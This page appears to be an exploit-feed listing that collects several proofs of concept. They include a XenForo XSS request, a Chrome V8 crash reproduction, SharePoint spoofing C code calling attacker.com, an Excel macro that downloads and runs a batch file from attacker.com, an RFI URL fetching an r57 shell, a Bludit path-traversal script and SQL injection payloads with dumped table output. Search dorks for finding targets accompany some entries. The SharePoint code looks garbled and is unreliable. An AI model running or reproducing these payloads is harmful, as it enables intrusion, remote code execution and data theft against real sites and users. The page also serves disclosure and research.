Latest exploits :: CodePwn

<pre><code># Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS # Date: 2023-06-24 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: https://x.com/admin.php?smilies # Version: 2.2.12 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /admin.php?smilie-categories/0/save HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?smilies/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 Content-Length: 1038 Origin: http://127.0.0.1 Connection: close Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616851,83fd2350307156281e51b17e20fe575b -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="title" <img src=x onerror=alert(document.domain)> -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="display_order" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfRequestUri" /admin.php?smilies/ -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfWithData" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616849,b74724a115448b864ba2db8f89f415f5 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfResponseType" json -----------------------------333176689514537912041638543422-- Response: After it is created, an alert comes immediately. </code></pre>

<pre><code>Chrome: Internal JavaScript object access via Origin Trials VULNERABILITY DETAILS 1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties. 2. The function is reachable from `IDLMemberInstaller::InstallAttributes`: ``` IDLMemberInstaller::InstallAttributes -> InstallAttribute -> Object::SetAccessorProperty -> JSObject::DefineAccessor ``` 3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code. 4. Some origin trials install attributes directly on the global object. To exploit the issue: 1. Add a non-configurable property to the global object. 2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped. 3. Enable an origin trial that redefines the property as configurable. 4. Delete the property. After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code. [1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164 VERSION Google Chrome 112.0.5615.49 (Official Build) (arm64) Chromium 114.0.5713.0 (Developer Build) (64-bit) REPRODUCTION CASE ``` <body> <script> var container = [{}]; function trigger() { container[0] = documentPictureInPicture; } Reflect.defineProperty( globalThis, 'documentPictureInPicture', { configurable: false, writable: true, value: {} }); documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot. for (let i = 0; i < 50000; i++) trigger(); // The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property // on the global object. meta = document.createElement('meta'); meta.httpEquiv = 'Origin-Trial'; meta.content = 'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' + 'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' + 'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ=='; document.head.appendChild(meta); delete documentPictureInPicture; trigger(); container[0].prop; // Trying to access a property of the hole object should cause to a crash. </script> </body> ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13. Related CVE Numbers: CVE-2023-2724. Found by: glazunov@google.com </code></pre>

<pre><code>// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : Remote // Vendor Homepage: // Microsoft SharePoint Foundation 2013 Service Pack 1 // Microsoft SharePoint Server Subscription Edition // Microsoft SharePoint Enterprise Server 2013 Service Pack 1 // Microsoft SharePoint Server 2019 // Microsoft SharePoint Enterprise Server 2016 // Tested on: Windows/Linux // CVE : CVE-2023-28288 #include <windows.h> #include <stdio.h> // The vulnerable SharePoint server URL const char *server_url = "http://example.com/"; // The URL of the fake SharePoint server const char *fake_url = "http://attacker.com/"; // The vulnerable SharePoint server file name const char *file_name = "vuln_file.aspx"; // The fake SharePoint server file name const char *fake_file_name = "fake_file.aspx"; int main() { HANDLE file; DWORD bytes_written; char file_contents[1024]; // Create the fake file contents sprintf(file_contents, "<html><head></head><body>This is a fake file.</body></html>"); // Write the fake file to disk file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating fake file: %d\n", GetLastError()); return 1; } if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) { printf("Error writing fake file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Send a request to the vulnerable SharePoint server to download the file sprintf(file_contents, "%s%s", server_url, file_name); file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating vulnerable file: %d\n", GetLastError()); return 1; } if (!InternetReadFileUrl(file_contents, file)) { printf("Error downloading vulnerable file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Replace the vulnerable file with the fake file if (!DeleteFile(file_name)) { printf("Error deleting vulnerable file: %d\n", GetLastError()); return 1; } if (!MoveFile(fake_file_name, file_name)) { printf("Error replacing vulnerable file: %d\n", GetLastError()); return 1; } // Send a request to the vulnerable SharePoint server to trigger the vulnerability sprintf(file_contents, "%s%s", server_url, file_name); if (!InternetReadFileUrl(file_contents, NULL)) { printf("Error triggering vulnerability: %d\n", GetLastError()); return 1; } // Print a message indicating that the vulnerability has been exploited printf("Vulnerability exploited successfully.\n"); return 0; } BOOL InternetReadFileUrl(const char *url, HANDLE file) { HINTERNET internet, connection, request; DWORD bytes_read; char buffer[1024]; // Open an Internet connection internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (internet == NULL) { return FALSE; } // Connect to the server connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (connection == NULL) { InternetCloseHandle(internet); return FALSE; } // Send the HTTP request request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); if (request == NULL) { InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } // Read the response data while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) { if (file != NULL) { // Write the data to disk if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } } } InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return TRUE; } </code></pre>

<pre><code>## Title: Microsoft Excel Microsoft® Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 06.27.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://portswigger.net/daily-swig/rce ## CVE-2023-33137 ## Description: This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him! When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty. STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users! [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html) ## Time spend: 01:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>==================================================================================================================================== | # Title : Adult Video Script 8.2 RFI /LFI Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Download : https://update.avscms.com/files/avscms-8.2-full.zip | | # Dork : Powered by AVSCMS | ==================================================================================================================================== P0C : [+] Dorking İn Google Or Other Search Enggine. [+] R/L File Inclusion : Line : 20 = include_once ('./lang/'.$lang_include); Function : include_once Variables :$lang_include C:\web\www\upload\siteadmin\editor_files\image.php [+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt? Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Active Matrimonial CMS v 1.5 HTML inject Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://activeitzone.com/demo/matrimonial_v1.5/ | | # Dork : "Active Matrimonial CMS - All Rights Reserved " | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Register new member . [+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/matrimonial_v1.5/home/profile [+] in Introduction box , put your code or use this code for test : <marquee>Hacked by indoushka</marquee> </tr> <td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a> </tr> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | ======================================================================================================================================= </code></pre>

<pre><code># -*- coding: utf-8 -*- #/usr/bin/env python # Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) # Date: 2022-07-21 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: < 3.13.1 # Tested on: Debian 10 - PHP Version: 7.3.14 import requests import argparse from bs4 import BeautifulSoup #pip3 install beautifulsoup4 def main(): parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) parser.add_argument('-f', '--file', type=str, required=True) args = parser.parse_args() print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args) def exploit(args): s2 = requests.Session() url = args.url.rstrip("/") #get csrf token r = s2.get(url+'/admin/') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'tokenCSRF'})['value'] #login body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password} r = s2.post(url+'/admin/', data=body, allow_redirects=False) if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) #arbitrary download r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file) if(r.status_code==200 and len(r.content)>0): print("[*] File:") print(r.text) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main() </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/40401/ │ │ Vendor : Thinu Tech │ │ Software : Thinu-CMS Blog System 1.5 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /category.php http://website/category.php?cat_id=[SQLI] GET parameter 'cat_id' is vulnerable to SQL Injection --- Parameter: cat_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat_id=3 AND 7897=7897 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cat_id=3 OR (SELECT 8233 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8233=8233,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cat_id=3 AND (SELECT 1981 FROM (SELECT(SLEEP(5)))lKbu) --- [+] Starting the Attack fetching current database current database: 'epiz_***50***_cms' fetching tables [10 tables] +----------------+ | ad_providers | | advertisements | | categories | | contacts | | navigation | | posts | | reports | | settings | | users | | users_online | +----------------+ fetching columns from Table 'users' [16 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | about | text | | cover_image | text | | token | text | | user_email | varchar(255) | | user_facebook | text | | user_firstname | varchar(255) | | user_id | int(255) | | user_image | text | | user_instagram | text | | user_job | varchar(255) | | user_lastname | varchar(255) | | user_password | varchar(255) | | user_role | varchar(255) | | user_twitter | text | | user_website | text | | username | varchar(255) | +----------------+--------------+ [-] Done </code></pre>